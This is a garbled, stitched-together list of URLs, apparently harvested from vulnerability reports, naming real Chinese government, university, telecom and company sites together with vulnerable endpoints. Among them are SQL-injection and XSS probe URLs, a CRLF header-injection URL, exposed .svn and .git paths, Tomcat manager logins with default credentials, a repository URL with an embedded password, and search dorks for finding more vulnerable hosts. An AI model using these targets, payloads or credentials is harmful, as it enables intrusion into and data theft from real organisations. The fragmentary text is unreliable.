http://www.jobch263.com//psearch.asp?key=::%C7%EB%D1%A1%D2%EB%D6%B0%CE%BB%C0%E0%B1%F0::&gzdd=noxz&city=%B2%BB%CF%DE&data=%B2%BB%CF%DE http://blog.ifeng.com/usercp/index.php?op=theme http://pc.guild.9game.cn/ka/list ftp://www.shac.gov.cn http://tools.yahui.cc/main.php http://tclcomm.com/service/sernet.asp http://www.yhcs88.com/tzzn_read.asp?id=1432 http://www.ccxzwzx.gov.cn/tzzn_read.asp?id=3209 http://60.8.102.174/tzzn_read.asp?id=3225 http://www.wyxzfw.com/tzzn_read.asp?id=2780 http://www.hyxzfw.gov.cn/tzzn_read.asp?id=1439 www.sdnsf.gov.cn http://www.sdnsf.gov.cn/portal/sims2003/echoinfo.php?id=437 http://jytghc.ujn.edu.cn:8088 http://sjzx.scswl.cn getshellhttp://118.244.237.84:8080/enroll/enrollHome.action http://jwxt.tzpc.edu.cn/cscl.asp http://jwgl.jhu.cn/cscl.asp http://222.187.199.60/cscl.asp http://jwc.jljtxy.com.cn/cscl.asp http://211.70.120.101/cscl.asp http://180.209.64.10/cscl.asp http://218.78.241.80/anmai/KY_Mamage/Integrate_Select/Task_Select_particular.aspx?id=1 http://jmzx.xmedu.cn:9999/anmai/KY_Mamage/Integrate_Select/Task_Select_particular.aspx?id=1 http://www.gxbyzx.cn:88/anmai/KY_Mamage/Integrate_Select/Task_Select_particular.aspx?id=1 http://oa.w12z.com/anmai/KY_Mamage/Integrate_Select/Task_Select_particular.aspx?id=1 http://www.xwgjzx.com:8888/anmai/KY_Mamage/Integrate_Select/Task_Select_particular.aspx?id=1 http://szxx.pudong-edu.sh.cn/anmai/KY_Mamage/Integrate_Select/Task_Select_particular.aspx?id=1 http://www.anmai.net/ http://gyxx.cmjy.sh.cn/anmai/Asset/Device/DeviceRebuildInfo_View.aspx?DeviceRebuildID=1 http://www.gxbyzx.cn:88/ANMAI/Asset/Device/DeviceRebuildInfo_View.aspx?DeviceRebuildID=1 http://jmzx.xmedu.cn:9999/ANMAI/Asset/Device/DeviceRebuildInfo_View.aspx?DeviceRebuildID=1 http://oa.w12z.com/ANMAI/Asset/Device/DeviceRebuildInfo_View.aspx?DeviceRebuildID=1 http://222.74.3.166:8081/ANMAI//Asset/Device/DeviceRebuildInfo_View.aspx?DeviceRebuildID=1 http://www.zc511.com/showIndex.do http://www.ewj2009.com/ http://www.nbzyyy.com/ 
http://wzyst.net/ http://www.yizheng.cc/ http://www.zjrrt.com/ http://www.zc511.com/showIndex.do Parameter:LoginName http://www.hangzhoudrt.com/findpwd.do http://www.xzdyf.cn/findpwd.do http://www.jhtht.com/findpwd.do http://www.wzyst.net/findpwd.do http://www.ewj2009.com/findpwd.do www.nm.zsks.cn http://mtest.yaya888.com/list.php?cat=1&id=62&f2=&f3=%E7%BF%BB%E7%9B%96&f4=%E5%85%A8%E9%94%AE%E7%9B%98&f5=%E6%97%A0%E6%91%84%E5%83%8F%E5%A4%B4&f6=IOS&price=1000-1499&f8=500%E4%B8%87%E5%83%8F%E7%B4%A0%E5%8F%8A%E4%BB%A5%E4%B8%8A&f9=2.1-3.0%E8%8B%B1%E5%AF%B8 http://cly.njtech.edu.cn/admin_login.htm http://222.177.182.34:8084/oas/home.action http://122.11.49.93/ http://www.hzzoy.com/ Parameter:LID http://www.bllib.net.cn:8080/lcd/lcd_Detail.html?LID=4905 http://218.2.112.243:8080/lcd/lcd_Detail.html?LID=495 http://202.197.107.11:86/lcd/lcd_Detail.html?LID=5776 http://163.21.191.31/lcd/lcd_Detail.html?LID=924 http://202.197.107.11:86/lcd/lcd_List.html?CategoryID=49 http://www.bllib.net.cn:8080/lcd/lcd_list.html?CategoryID=85 http://www.msit21.com/lcd/lcd_list.html?CategoryID=359 http://218.2.112.243:8080/lcd/lcd_List.html?CategoryID=240 http://163.21.191.31/lcd/lcd_List.html?CategoryID=21 http://xadyyypxks.gotoip3.com/hospital/course!showCourseDetail.action http://www.cn-dt.com.cn/cms/template/templateList.jsp http://www.cn-dt.com.cn//common/ http://www.cn-dt.com.cn/cms/ http://www.cn-dt.com.cn/extfile/ http://www.cn-dt.com.cn/conf/ http://www.cn-dt.com.cn/stat/ http://www.cn-dt.com.cn/stat/leftbar.jsp http://www.cn-dt.com.cn/conf/ConfInputList.jsp# http://www.cn-dt.com.cn/conf/leftbar.jsp http://www.cn-dt.com.cn/conf/mqueryDetail.jsp?link=cms_td_info_history http://www.cn-dt.com.cn/common/acc/leftbar.jsp http://www.cn-dt.com.cn/common/sweditor/时,我发现目录没有出来,我就http://www.cn-dt.com.cn/common/sweditor/CVS/Entries http://www.cn-dt.com.cn/common/sweditor/ewebeditor.htm http://jsgl.nxsl.gov.cn/common/toHtmlEdit.do?fld=icontent&mode=&id= 
http://替换我/common/sweditor/jsp/savefile.jsp?action=save&type=image&style=full&language=zh-cn&cusdir= http://121.28.34.69/hbwx/findcus.action http://www.nissan.com.cn/pivo/blog/detail.php?id=32 http://gxy.sxdtdx.edu.cn/i.html http://kjc.sxdtdx.edu.cn/i.html http://public.sxdtdx.edu.cn/jpkc/i.html inurl:jcl_news.asp?id= http://sxhaoyao.com/jcl_news.asp?id=418 http://13xiang.cn/jcl_news.asp?id=369 http://www.sxxfn.com/jcl_news.asp?id=392 http://www.sxkaize.cn/jcl_news.asp?id=71 http://www.sxhxjz.com/jcl_news.asp?id=496 http://211.136.100.30:9090/ http://211.136.100.30:9090/.git/config http://stashpull:po2lf8anyaxlqxmgalk89jh@stash.21cake.com/scm/ic/ic-desktop.git http://stashpull:po2lf8anyaxlqxmgalk89jh@stash.21cake.com/scm/ic/ic-desktop.git url:http://106.39.15.102:80/manager/html user:admin pass:admin http://106.39.15.102/CNR-KJ/ http://www.southsoft.com.cn/ http://***.***.**.*** http://oauth.d.cn/auth/goLogin.html?to=http%3A%2F%2Fwww.d.cn%2F http://shop.lenovo.com.cn/index.html,看到站点非https加密协议的 url:http://120.237.116.74:80/manager/html user:tomcat pass:tomcat url:http://159.226.113.165:80/manager/html user:admin pass:admin http://118.144.81.21:8080/soonet/Http/http_wpublished http://www.gzgslz.jx.cn/luzhengoa/online/listDoc.php?typeId=11 http://www.gzgslz.jx.cn/luzhengoa/online/listDoc.php?searchKey=1 http://www.gzgslz.jx.cn/oa/edit/admin_login.asp http://www.gzgslz.jx.cn/oa/4.asp www.nsccsz.gov.cn http://218.92.71.5:1182/theme/1/Course.aspx?CourseID=1 http://58.54.132.28:8080/theme/1/Course.aspx?CourseID=1 http://119.60.3.156:8097/theme/1/Course.aspx?CourseID=1 http://202.202.111.184/theme/1/Course.aspx?CourseID=5 http://www.mbastudy.cn/theme/1/Course.aspx?CourseID=1 http://110.249.221.93/ http://box.zhangmen.baidu.com/box-jump.html?u=vbscript:Alert%28Document.Domain%29 http://bssyxxgl.eicbs.com/anmai/Asset/Device/currentassetstatright.aspx?useddepart=1&assetname=&assetspec=&assetmodel=&assetfactory=&assetmodeltype=&Lead_date_end=2015-3-9&hidsearch=search 
http://www.shibei.edu.sh.cn/anmai/Asset/Device/currentassetstatright.aspx?useddepart=1&assetname=1&assetspec=1&assetmodel=2&assetfactory=3&assetmodeltype=1&Lead_date_end=2015-3-9&hidsearch=search http://ps.imau.edu.cn/anmai/Asset/Device/currentassetstatright.aspx?useddepart=1&assetname=1&assetspec=2&assetmodel=3&assetfactory=4&assetmodeltype=&Lead_date_end=2015-3-9&hidsearch=search http://jmzx.xmedu.cn:9999/anmai/Asset/Device/currentassetstatright.aspx?useddepart=1&assetname=1&assetspec=2&assetmodel=3&assetfactory=4&assetmodeltype=&Lead_date_end=2015-3-9&hidsearch=search http://anmai.net:81/Asset/Device/currentassetstatright.aspx?useddepart=1&assetname=1&assetspec=2&assetmodel=3&assetfactory=4&assetmodeltype=&Lead_date_end=2015-3-9&hidsearch=search http://www.powercreator.com.cn/ http://119.60.3.156:8092/Theme/1/OpenDownload.aspx?DownloadID=3 http://202.202.111.184//theme/1/OpenDownload.aspx?DownloadID=1 http://218.92.71.5:1182/theme/1/OpenDownload.aspx?DownloadID=1 http://58.54.132.28:8080/theme/1/OpenDownload.aspx?DownloadID=1 http://www.mbastudy.cn/theme/1/OpenDownload.aspx?DownloadID=1 http://oa.scxxt.com.cn http://202.98.213.134/show_image.aspx?ImageID=@@version http://125.66.128.229/show_image.aspx?ImageID=@@version http://www.rhfcgl.com/show_image.aspx?ImageID=@@version http://58.42.144.172/show_image.aspx?ImageID=@@version http://www.zylzfc.cn/show_image.aspx?ImageID=@@version http://www.dyfgs.com/show_image.aspx?ImageID=@@version http://www.ysfgj.com.cn/show_image.aspx?ImageID=@@version http://222.86.207.241/show_image.aspx?ImageID=@@version http://admin.diantai.ifeng.com/ http://admin.diantai.ifeng.com/.svn/entries http://admin.diantai.ifeng.com:80/test.php http://admin.diantai.ifeng.com/static/js/uploadify/.htaccess http://admin.diantai.ifeng.com//index.php/users http://admin.diantai.ifeng.com///index.php/users/%0d%0a%20SomeCustomInjectedHeader:xxxx123/ http://**.**.**/MPS02/ http://appinterface.symbolmedia.cn/?iid=1 http://116.255.227.78:84/ 
http://116.255.227.78:84/web.zip http://www.nlrkjsw.gov.cn/cs/index.asp http://www.powercreator.com.cn/ http://***.**.*.** inurl:RESWEB/ResWebResDetaile.aspx http://***.**.**.*:*** http://www.ltpower.net/ http://www2.gdufs.edu.cn/zzxw/exam/ewebeditor/admin_login.asp http://jpk.jxvtc.edu.cn/yxa/exam/ewebeditor/admin_login.asp http://jpkc.guat.edu.cn/xiaoji/mzdgl/test/ewebeditor/admin_login.asp http://jpkc.zzti.edu.cn/C202/test/ewebeditor/admin_login.asp http://210.38.136.69:8006/exam/ewebeditor/admin_login.asp http://www.ltpower.net/ Pamareter:Exercises_Id http://jpkc.nwpu.edu.cn/jp2005/29/exam/Course/Exercises_help.asp?Exercises_Id=23 http://wy.ycu.jx.cn/fyllysj/test/Exercises_help.asp?Exercises_Id=55 http://202.114.196.26:8088/2010jpkc/cljthx/Course/OnLineExam/Course/Exercises_help.asp?Exercises_Id=41 http://210.38.136.69:8006/exam/Exercises_help.asp?Exercises_Id=60 http://jpk.jxvtc.edu.cn/yxa/exam/Exercises_help.asp?Exercises_Id=69 http://www.m6go.com/my/address.do?addressid=380915 id:380915: index.php/login/login http://higo.meilishuo.com http://dealer.bitauto.com/100041947/OrderSubmit/Vote?XCWEBLOG_ID=9d974d351ec64d09839df0f74a3bcd58&ids=300940&vid=69330&__RequestVerificationToken=1 http://113.108.148.4:8090/,并猜测其他地市管理员口令可能同样为弱口令,使用jx-nc/jx-nc成功登录,在系统里发现一FTP信息: ftp://61.143.60.84 http://webservice.tjbtn.net/selfservice/public/login.action http://wapi.hexun.com/Api_newsXml.cc?appId=1&pid=1002347218&pc=20&pn=1 http://open.meilishuo.com Pamareter:Email http://jpkc.guat.edu.cn/xiaoji/mzdgl/test/index.asp http://jpkc.nwpu.edu.cn/jp2005/29/exam/index.asp http://jpkc.wipe.edu.cn/www/jpkc/zq/Exam/Course/index.asp http://wy.ycu.jx.cn/fyllysj/test/index.asp http://jpk.jxvtc.edu.cn/yxa/exam/index.asp http://jgzfjs.seu.edu.cn/vote/votepage.action http://127.0.0.1/躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺.asp;.txt http://cwgl.swu.edu.cn:8080/login.aspx 
http://www.gtggjy.com/TSPB/cms/zlfile/ZlFileCTRL.do?action=download&zlGuid=F733FAD00EA6FE07348C883F442F3DAB http://www.qfztb.gov.cn/TSPB/cms/zlfile/ZlFileCTRL.do?action=download&zlGuid=F733FAD00EA6FE07348C883F442F3DAB http://www.zjhnztb.com/TSPB/cms/zlfile/ZlFileCTRL.do?action=download&zlGuid=F733FAD00EA6FE07348C883F442F3DAB http://www.jszbw.com/TSPB/cms/zlfile/ZlFileCTRL.do?action=download&zlGuid=F733FAD00EA6FE07348C883F442F3DAB http://www.smztb.com.cn/TSPB/cms/zlfile/ZlFileCTRL.do?action=download&zlGuid=F733FAD00EA6FE07348C883F442F3DAB http://122.226.154.126/TSPB/cms/zlfile/ZlFileCTRL.do?action=download&zlGuid=F733FAD00EA6FE07348C883F442F3DAB http://m.fj.189.cn:80/.svn/entries http://youhui.live.189.cn:80/.svn/entries http://ah.189.cn:80/act/resources/scripts/red/.svn/entries http://yxzcpt.189.cn:80/.svn/entries http://cps.live.189.cn:80/.svn/entries http://waphe.189.cn:80/wap_heb/.svn/entries http://ifree.bj.189.cn/resin-doc/viewfile/?file=index.jsp http://ifree.bj.189.cn/resin-doc/examples/ioc-periodictask/viewfile?file=WEB-INF/web.xml http://cs.gx.189.cn/resin-doc/viewfile/?file=index.jsp http://kzone.zhidao.189.cn/resin-doc/viewfile/?file=index.jsp http://fancy.189.cn/resin-doc/viewfile/?file=index.jsp http://ask.zhidao.189.cn:80/resin-doc/viewfile/?file=index.jsp http://222.82.232.227:9991/bszn!all.action http://xygs.xjaic.gov.cn:7007/login/index.action http://www.e-tiller.com/ch/index.aspx http://***.***.***.cn http://***.***.***.cn/ch/reader/wait_published_articles.aspx http://xuebao.bsu.edu.cn/ch/reader/wait_published_articles.aspx http://www.joconline.com.cn/ch/reader/wait_published_articles.aspx http://www.jbscn.org/swuaqxbcn/ch/reader/wait_published_articles.aspx http://www.shzyyzz.com/shzyyzz/ch/reader/wait_published_articles.aspx http://www.rehabi.com.cn/ch/reader/wait_published_articles.aspx http://www.kayou315.com/manage/main.php http://www.kayou315.com/ckfinder/ckfinder.html?type=Images&CKEditor=content&CKEditorFuncNum=1&langCode=zh-cn 
http://www.ecs.cn/ http://www.jhyzh.com/OperationManage/ViewSecrecyGuestBookMessage.aspx?sn=test&sp=test&oid=0&type=2 http://www.qzxx.net/OperationManage/ViewSecrecyGuestBookMessage.aspx?sn=test&sp=test&oid=0&type=2 http://www.hbycscjzx.com/OperationManage/ViewSecrecyGuestBookMessage.aspx?sn=test&sp=test&oid=0&type=2 http://www.rzk9.com/OperationManage/ViewSecrecyGuestBookMessage.aspx?sn=test&sp=test&oid=0&type=2 http://www.tysyxx.cn/OperationManage/ViewSecrecyGuestBookMessage.aspx?sn=test&sp=test&oid=0&type=2 https://github.com/zranye/code/blob/e89ba411a8e3060d8e221cf44d118e7de3c09786/lotfilter/bin/lotfilter.properties http://pga.mgh.harvard.edu/cgi-bin/snap3/websnaper3.cgi http://log.yiqi.autodmp.cig.com.cn/ http://log.yiqi.autodmp.cig.com.cn/dealers/get_list_bypager?m_pageindex=1&m_pagesize=10&m_provinceid=330000%09%09%09%09%09%09%09% http://log.yiqi.autodmp.cig.com.cn/lms_api/stat/get_stat_product_list?start_time=20150228%20and%201=1&end_time=20150328 http://log.yiqi.autodmp.cig.com.cn/lms_api/clue/get_clue_list_bypaper?starttime=1425132344&endtime=1427551544&page_index=1&page_size=20&approach=&channel=&carmodel=&meida=&province=&city=&district=&dealer=&cartype=&state=&activity=&keyword=&sortfield=post_time&sort=desc>ype=1&verify_status=&1427551576702 http://jxsi215.oicp.net:59093/mev1/ http://cwc.hunnu.edu.cn/admin/default.aspx http://www.gtggjy.com/TSPB/web/zypt/zypt.jsp?orderid=4&parentid=5D9D029D-B45F-4D71-ADC4-B7830971B5A9 http://www.qfztb.gov.cn/TSPB/web/zypt/zypt.jsp?orderid=4&parentid=5D9D029D-B45F-4D71-ADC4-B7830971B5A9 http://www.zjhnztb.com/TSPB/web/zypt/zypt.jsp?orderid=4&parentid=5D9D029D-B45F-4D71-ADC4-B7830971B5A9 http://www.jszbw.com/TSPB/web/zypt/zypt.jsp?orderid=4&parentid=5D9D029D-B45F-4D71-ADC4-B7830971B5A9 http://www.smztb.com.cn/TSPB/web/zypt/zypt.jsp?orderid=4&parentid=5D9D029D-B45F-4D71-ADC4-B7830971B5A9 http://122.226.154.126/TSPB/web/zypt/zypt.jsp?orderid=4&parentid=5D9D029D-B45F-4D71-ADC4-B7830971B5A9 
http://car.51yund.com/mobile/get_all_nopay_order.php http://car.51yund.com/mobile/get_all_pay_order.php http://www.samsoncn.com/ www.*****.com http://www.*****.com http://www.*****.com/Corp/Announcement.aspx http://www.zdxbgxb.com/Corp/Announcement.aspx http://www.zgylxtb.cn/Corp/Announcement.aspx http://jsju.paperonce.org/Corp/Announcement.aspx http://xbskb.ysu.edu.cn/Corp/Announcement.aspx http://www.jwit.org.cn/Corp/Announcement.aspx http://www.aisida.cn/)开发的某套CMS程序。 inurl:qywh.php?id= http://www.wuzhongheg.com/qywh.php?id=12 http://www.csjfilter.com/qywh.php?id=298 http://www.ytpipes.com.cn/qywh.php?id=36 http://www.s5588.com/aboutus/qywh.php?id=2 http://www.kmfunway.cn/qywh.php?id=10 http://www.114dhsc.com/logonAction.action http://210.37.2.181/dlib/homepage/link/link_show.asp?action=list&lang=gb http://202.119.210.5/dlib/homepage/link/link_show.asp?action=list&lang=gb http://202.117.122.44/dlib/homepage/link/link_show.asp?action=list&lang=gb http://202.103.233.136/dlib/homepage/link/link_show.asp?action=list&lang=gb http://211.83.206.52/dlib/homepage/link/link_show.asp?action=list&lang=gb www.jiajiao400.com http://218.78.241.80/anmai/KY_Mamage/Others/Communion_Incept_Right.aspx?depname=a http://jmzx.xmedu.cn:9999/anmai/KY_Mamage/Others/Communion_Incept_Right.aspx?depname=a http://www.gxbyzx.cn:88/anmai/KY_Mamage/Others/Communion_Incept_Right.aspx?depname=a http://oa.w12z.com/anmai/KY_Mamage/Others/Communion_Incept_Right.aspx?depname=a http://www.xwgjzx.com:8888/anmai/KY_Mamage/Others/Communion_Incept_Right.aspx?depname=a http://szxx.pudong-edu.sh.cn/anmai/KY_Mamage/Others/Communion_Incept_Right.aspx?depname=a http://hs.tgbus.com http://218.78.241.80/anmai/KY_Mamage/Integrate_Select/GetAward_Production_particular.aspx?id=1 http://jmzx.xmedu.cn:9999/anmai/KY_Mamage/Integrate_Select/GetAward_Production_particular.aspx?id=1 http://www.gxbyzx.cn:88/anmai/KY_Mamage/Integrate_Select/GetAward_Production_particular.aspx?id=1 
http://oa.w12z.com/anmai/KY_Mamage/Integrate_Select/GetAward_Production_particular.aspx?id=1 http://www.xwgjzx.com:8888/anmai/KY_Mamage/Integrate_Select/GetAward_Production_particular.aspx?id=1 http://szxx.pudong-edu.sh.cn/anmai/KY_Mamage/Integrate_Select/GetAward_Production_particular.aspx http://drops.wooyun.org/tips/5136 https://github.com/loveshell/ngx_lua_waf https://github.com/loveshell/ngx_lua_waf/blob/master/init.lua http://bm.huagongjob.net/ http://www.huagongjob.net/searchresult.asp http://www.jianzhuhr.net/ http://www.jianzhuhr.net/searchresult.asp http://www.muqianghr.com/ http://www.muqianghr.com/searchresult.asp http://bm.huagongjob.net/ http://www.jianzhuhr.net/ http://www.muqianghr.com/ http://www.jixiejob.net/index.asp http://qc.jixiejob.net/ http://nffund.com/QueryFundSylServlet?fundcode=160134&date=2014-12-09 http://118.123.15.135/Main/Main.aspx http://118.123.15.23/8080/Login.aspx http://www.flcit.com/Login!showLogin.do http://www.xmxayz.com/Login!showLogin.do http://211.64.205.214/Gmis/Byyxwgl/glllt.aspx http://gs.njfu.edu.cn/Gmis/Byyxwgl/glllt.aspx http://202.206.151.85:8080/Gmis/Byyxwgl/glllt.aspx http://yjs.cdutcm.edu.cn:8080/Gmis/Byyxwgl/glllt.aspx http://graduate.hnust.cn/Gmis/Byyxwgl/glllt.aspx http://202.203.225.17:8080/Gmis/Byyxwgl/glllt.aspx http://218.75.27.177/Gmis/Byyxwgl/glllt.aspx http://yjsy.wmu.edu.cn:8080/Gmis/Byyxwgl/glllt.aspx http://101.76.99.20/Gmis/Byyxwgl/glllt.aspx http://61.187.179.68:8080/Gmis/Byyxwgl/glllt.aspx http://yjsy.wzmc.edu.cn:8080/Gmis/Byyxwgl/glllt.aspx http://210.43.126.80:8080/Gmis/Byyxwgl/glllt.aspx http://211.64.205.214/Gmis/Byyxwgl/glllt.aspx http://www.liangjing.org/qiyejianzhan/Ch/ProductClass-2.html inurl:Chinese/Bs_NewsInfo.asp?Action=Co&id= http://www.jat-cva.com.cn/Chinese/Bs_ProductShow.asp?ArticleID=150 http://www.sunshinepaperbox.com/Chinese/Bs_ProductShow.asp?ArticleID=225 http://www.bjiee.com.cn/newweb/chinese/Bs_ProductShow.asp?ArticleID=133 
http://www.hrpackage.com.cn/Chinese/Bs_ProductShow.asp?ArticleID=215 http://www.taishantyre.com/Chinese/Bs_ProductShow.asp?ArticleID=183 http://www.napacoustics.com.hk/Chinese/Bs_ProductShow.asp?ArticleID=106 http://www.pandaintl.com.cn/cn/Bs_ProductShow.asp?ArticleID=579 http://www.jianhuyi.com/Chinese/Bs_ProductShow.asp?ArticleID=121 http://www.caltexoils.cn/Chinese/Bs_ProductShow.asp?ArticleID=118 http://www.watsin.com.cn/Chinese/Bs_ProductShow.asp?ArticleID=168 http://www.wishfuloptical.com/Chinese/Bs_ProductShow.asp?ArticleID=219 http://www.bo-power.com/chinese/Bs_ProductShow.asp?ArticleID=365 http://test.sinouk.org.uk/Chinese/Bs_ProductShow.asp?ArticleID=121 http://www.3variables.sg/Chinese/Bs_ProductShow.asp?ArticleID=57 http://www.cdrich.cn/cn/Bs_ProductShow.asp?ArticleID=80 http://www.yunyangqx.com/chinese/Bs_ProductShow.asp?ArticleID=410 http://www.zpaec.com/Chinese/Bs_ProductShow.asp?ArticleID=151 http://www.maing-yion.com.tw/Chinese/Bs_ProductShow.asp?ArticleID=123 http://www.ludingtools.com/Chinese/Bs_ProductShow.asp?ArticleID=270 http://www.hbhxdl.net/chinese/Bs_ProductShow.asp?ArticleID=510 http://www.shuangfeng-china.com/cn/Bs_Product.asp?BigClassName=%C6%FB%B3%B5%D6%D0%C0%E4%C6%F7 http://www.jat-cva.com.cn/Chinese/Bs_Product.asp?BigClassName=%BB%AF%B9%A4%C9%FA%B2%FA%C9%E8%B1%B8 http://www.sunshinepaperbox.com/Chinese/Bs_Product.asp?BigClassName=%BB%AF%D7%B0%CA%D7%CA%CE%BA%D0 http://www.bjiee.com.cn/newweb/chinese/Bs_Product.asp?BigClassName=%C4%E0%BD%AC%B2%C4%C1%CF http://www.hrpackage.com.cn/Chinese/Bs_Product.asp?BigClassName=%C6%FB%B3%B5%D3%C3%C6%B7%B0%FC%D7%B0 http://www.taishantyre.com/Chinese/Bs_Product.asp?BigClassName=%D4%D8%D6%D8%C6%FB%B3%B5%A1%A2%B4%F3%BF%CD%B3%B5%C2%D6%CC%A5 http://www.napacoustics.com.hk/Chinese/Bs_Product.asp?BigClassName=NAP%CF%FB%C9%F9%C6%F7%CF%B5%C1%D0 http://www.pandaintl.com.cn/cn/Bs_Product.asp?BigClassName=%D2%BA%BE%A7%B5%E7%CA%D3 
http://www.jianhuyi.com/Chinese/Bs_Product.asp?BigClassName=%BC%E0%BB%A4%D2%C7OEM%C4%A3%BF%E9 http://www.caltexoils.cn/Chinese/Bs_Product.asp?BigClassName=%BC%D3%B5%C2%CA%BF%C6%FB%BB%FA%D3%CD http://www.watsin.com.cn/Chinese/Bs_Product.asp?BigClassName=%BD%F0%D2%F2%EB%C4 http://www.wishfuloptical.com/Chinese/Bs_Product.asp?BigClassName=CR39%20Resin%20Lens http://www.bo-power.com/chinese/Bs_Product.asp?BigClassName=EʮH http://test.sinouk.org.uk/Chinese/Bs_Product.asp?BigClassName=BSCE%20Activities http://www.3variables.sg/Chinese/Bs_Product.asp?BigClassName=%CA%B1%B3%BD%D1%D5%C9%AB%B6%A8%CE%BB%D6%D3 http://www.cdrich.cn/cn/Bs_Product.asp?BigClassName=%C9%E8%20%B1%B8%20%D6%C6%20%D4%EC http://www.yunyangqx.com/chinese/Bs_Product.asp?BigClassName=%B2%FA%BF%C6%C6%F7%D0%B5 http://www.zpaec.com/Chinese/Bs_Product.asp?BigClassName=%C8%ED%BC%FE%CA%E9%BC%AE http://www.ludingtools.com/Chinese/Bs_Product.asp?BigClassName=%D6%E9%B1%A6%B9%A4%BE%DF http://www.hbhxdl.net/chinese/Bs_Product.asp?BigClassName=%BB%EE%C3%C5 http://www.jat-cva.com.cn/Chinese/Bs_NewsInfo.asp?Action=Co&id=97 http://www.bjiee.com.cn/newweb/chinese/Bs_NewsInfo.asp?Action=Co&id=141 http://www.hrpackage.com.cn/Chinese/Bs_NewsInfo.asp?Action=Co&id=89 http://www.taishantyre.com/Chinese/Bs_NewsInfo.asp?Action=Co&id=319 http://www.napacoustics.com.hk/Chinese/Bs_NewsInfo.asp?Action=Co&id=87 http://www.pandaintl.com.cn/cn/Bs_NewsInfo.asp?Action=Co&id=95 http://www.jianhuyi.com/Chinese/Bs_NewsInfo.asp?Action=Co&id=85 http://www.caltexoils.cn/Chinese/Bs_NewsInfo.asp?Action=Co&id=103 http://www.watsin.com.cn/chinese/Bs_NewsInfo.asp?Action=Co&id=159 http://test.sinouk.org.uk/Chinese/Bs_NewsInfo.asp?Action=Co&id=117 http://www.3variables.sg/Chinese/Bs_NewsInfo.asp?Action=Co&id=149 http://www.cdrich.cn/cn/Bs_NewsInfo.asp?Action=Co&id=21 http://www.yunyangqx.com/chinese/Bs_NewsInfo.asp?Action=Co&id=99 http://www.maing-yion.com.tw/Chinese/Bs_NewsInfo.asp?Action=Co&id=90 
http://www.zenchant.com/Bs_NewsInfo.asp?Action=Co&id=31 http://www.zhihefrp.com/Chinese/Bs_NewsInfo.asp?Action=Co&id=114 http://www.yantaicherry.com/cn/bs_newsinfo.asp?action=Ye&id=19 http://www.fumingwei.com/chinese/Bs_NewsInfo.asp?Action=Co&id=28 http://www.xmmrcs.com/chinese/Bs_NewsInfo.asp?Action=Co&id=761 http://www.zpaec.com/Chinese/Bs_NewsInfo.asp?Action=Ye&id=76 http://www.jat-cva.com.cn/Chinese/Bs_FaqInfo.asp?id=73 http://www.napacoustics.com.hk/chinese/Bs_FaqInfo.asp?id=2 http://www.88831535.com/Chinese/Bs_FaqInfo.asp?id=70 http://www.taishantyre.com/Chinese/Bs_FaqInfo.asp?id=72 http://www.cdrich.cn/cn/Bs_FaqInfo.asp?id=4 http://www.auhuaceramics.com/auhua/Chinese/Bs_FaqInfo.asp?id=70 http://www.fumingwei.com/Chinese/Bs_FaqInfo.asp?id=1 http://www.3variables.sg/Chinese/Bs_FaqInfo.asp?id=15 http://www.xmmrcs.com/Chinese/Bs_FaqInfo.asp?id=119 http://www.djgyl.com/chinese/Bs_FaqInfo.asp?id=71 http://www.ludi8.com/Chinese/Bs_FaqInfo.asp?id=85 http://www.zgxhnyfw.com/Chinese/Bs_FaqInfo.asp?ID=146 http://www.lnxhnyfw.com/Chinese/Bs_FaqInfo.asp?ID=132 http://www.patangye.com.cn/patangye/patangye/chinese/Bs_FaqInfo.asp?id=76 http://www.ahxhnyfw.com/Chinese/Bs_FaqInfo.asp?ID=117 http://www.hnxhnyfw.com/Chinese/Bs_FaqInfo.asp?ID=92 http://www.jsxhnyfw.com/Chinese/Bs_FaqInfo.asp?ID=114 http://jws.wjtvu.cn/chinese/Bs_FaqInfo.asp?id=2 http://www.winkingled.com/cn/Bs_FaqInfo.asp?id=1 http://www.cxfz.cn/cx/cx/chinese/Bs_FaqInfo.asp?id=71 http://www.dvd168.cn/Chinese/Bs_FaqInfo.asp?id=92 http://www.guanjian365.net/chinese/Bs_FaqInfo.asp?id=86 http://www.xwbg.cn/xw/main/Bs_FaqInfo.asp?id=71 http://www.caltexoils.cn/Chinese/Bs_FaqInfo.asp?id=70 http://blogadmin.ci123.com/blogs/config/ http://www.rzfwzx.gov.cn/workplate/base/person/listbyorgsel.aspx http://www.bdxzfw.cn/workplate/base/person/listbyorgsel.aspx http://www.cxxzfwzx.com/workplate/base/person/listbyorgsel.aspx http://wxxz.gov.cn/workplate/base/person/listbyorgsel.aspx 
http://www.hdxzwzx.com/workplate/base/person/listbyorgsel.aspx http://xz.njqsp.com:8001/workplate/base/person/listbyorgsel.aspx http://211.142.37.152:81/workplate/base/person/listbyorgsel.aspx http://211.142.37.152:88/workplate/base/person/listbyorgsel.aspx http://211.142.37.154:83/workplate/base/person/listbyorgsel.aspx http://211.142.37.152:83/workplate/base/person/listbyorgsel.aspx http://183.203.128.238:82/workplate/base/person/listbyorgsel.aspx http://211.142.41.114:82/workplate/base/person/listbyorgsel.aspx http://www.hbsxxzfwzx.gov.cn/workplate/base/person/listbyorgsel.aspx http://www.lzxzfwzx.com/workplate/base/person/listbyorgsel.aspx http://www.axxzfwzx.com/workplate/base/person/listbyorgsel.aspx http://gyxzfw.net/workplate/base/person/listbyorgsel.aspx http://60.220.253.153:81/workplate/base/person/listbyorgsel.aspx http://60.220.240.7/workplate/base/person/listbyorgsel.aspx http://211.142.37.152:85/workplate/base/person/listbyorgsel.aspx www.qxxzfwzx.com/workplate/base/person/listbyorgsel.aspx http://xz.njqsp.com:8001/workplate/base/person/listbyorgsel.aspx http://211.142.37.152:82/workplate/base/person/listbyorgsel.aspx http://www.rzfwzx.gov.cn/workplate/base/person/listbyorgsel.aspx为例: www.rzfwzx.gov.cn http://www.rzfwzx.gov.cn http://gj.517na.com/ http://th.517na.com/ http://gq.517na.com/ http://user.517na.com/ http://jd.517na.com/ http://yc.517na.com/ http://jqw.com/admin/left.aspx 